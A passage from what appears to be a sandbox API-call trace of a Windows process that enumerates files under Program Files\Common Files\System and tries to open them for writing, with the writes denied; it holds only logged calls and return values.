dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0088.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0088.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0088.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.317] AreFileApisANSI () returned 1 [0088.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll", lpUsedDefaultChar=0x0) returned 54 [0088.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0088.318] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.318] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0088.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0088.318] AreFileApisANSI () returned 1 [0088.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75c60 [0088.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x75c60, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll") returned 54 [0088.318] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadrh15.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0088.319] GetFileType (hFile=0x368) returned 0x1 [0088.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0088.319] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.319] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.319] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.319] CloseHandle (hObject=0x368) returned 1 [0088.319] AreFileApisANSI () returned 1 [0088.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76188 [0088.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll") returned 54 [0088.320] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadrh15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.320] GetLastError () returned 0x5 [0088.320] GetLastError () returned 0x5 [0088.320] SetLastError (dwErrCode=0x5) [0088.320] GetLastError () returned 0x5 [0088.320] SetLastError (dwErrCode=0x5) [0088.320] GetLastError () returned 0x5 [0088.320] SetLastError (dwErrCode=0x5) [0088.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0088.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0088.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0088.320] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.320] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.320] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x6a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6a3b8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x6a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="do", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓搀\x01⺊Ā")) returned 0 [0088.320] FindClose (in: hFindFile=0x78310 | out: hFindFile=0x78310) returned 1 [0088.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0088.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0088.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0088.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0088.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0088.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0088.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0088.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0088.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0088.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0088.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0088.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0088.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0088.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0088.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0088.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0088.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0088.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0088.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0088.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0088.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0088.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0088.321] AreFileApisANSI () returned 1 [0088.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\DirectDB.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\DirectDB.dll", lpUsedDefaultChar=0x0) returned 50 [0088.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0088.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0088.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0088.322] AreFileApisANSI () returned 1 [0088.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0088.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46198 [0088.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x46198, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\DirectDB.dll") returned 50 [0088.322] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\DirectDB.dll" (normalized: "c:\\program files\\common files\\system\\directdb.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0088.326] GetFileType (hFile=0x420) returned 0x1 [0088.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46198 | out: hHeap=0x20000) returned 1 [0088.326] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.326] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.327] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.327] CloseHandle (hObject=0x420) returned 1 [0088.327] AreFileApisANSI () returned 1 [0088.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0088.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46b38 [0088.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x46b38, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\DirectDB.dll") returned 50 [0088.327] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\DirectDB.dll" (normalized: "c:\\program files\\common files\\system\\directdb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.327] GetLastError () returned 0x5 [0088.327] GetLastError () returned 0x5 [0088.327] SetLastError (dwErrCode=0x5) [0088.327] GetLastError () returned 0x5 [0088.327] SetLastError (dwErrCode=0x5) [0088.327] GetLastError () returned 0x5 [0088.327] SetLastError (dwErrCode=0x5) [0088.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0088.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0088.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0088.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.328] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0cb3579, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="en-US", cAlternateFileName="")) returned 1 [0088.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0088.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0088.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0088.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0088.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0088.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0088.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0088.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0088.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0088.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0088.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0088.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0088.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0088.328] AreFileApisANSI () returned 1 [0088.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\en-US", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\en-US", lpUsedDefaultChar=0x0) returned 43 [0088.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0088.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0088.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0088.329] AreFileApisANSI () returned 1 [0088.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0088.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x678a0 [0088.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x678a0, cchWideChar=43 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\en-US") returned 43 [0088.329] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\en-US" (normalized: "c:\\program files\\common files\\system\\en-us"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.329] GetLastError () returned 0x5 [0088.329] GetLastError () returned 0x5 [0088.329] SetLastError (dwErrCode=0x5) [0088.329] GetLastError () returned 0x5 [0088.329] SetLastError (dwErrCode=0x5) [0088.329] GetLastError () returned 0x5 [0088.329] SetLastError (dwErrCode=0x5) [0088.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x678a0 | out: hHeap=0x20000) returned 1 [0088.329] AreFileApisANSI () returned 1 [0088.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0088.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x678a0 [0088.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x678a0, cchWideChar=43 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\en-US") returned 43 [0088.330] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\en-US" (normalized: "c:\\program files\\common files\\system\\en-us"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.330] GetLastError () returned 0x5 [0088.330] GetLastError () returned 0x5 [0088.330] SetLastError (dwErrCode=0x5) [0088.330] GetLastError () returned 0x5 [0088.330] SetLastError (dwErrCode=0x5) [0088.330] GetLastError () returned 0x5 [0088.330] SetLastError (dwErrCode=0x5) [0088.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x678a0 | out: hHeap=0x20000) returned 1 [0088.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0088.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0088.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0088.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0088.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0088.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0088.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0088.330] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d7f179, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msadc", cAlternateFileName="")) returned 1 [0088.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0088.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0088.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0088.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0088.330] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\System\\en-US\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78750 [0088.330] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0cb3579, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.331] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dd86035, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x755f99d9, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x75fdf500, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x17000, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab32res.dll.mui", cAlternateFileName="")) returned 1 [0088.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0088.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0088.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0088.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0088.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0088.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0088.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0088.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0088.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0088.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0088.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0088.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x464a8 [0088.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0088.331] RtlAllocateHeap (HeapHandle=0x20000, 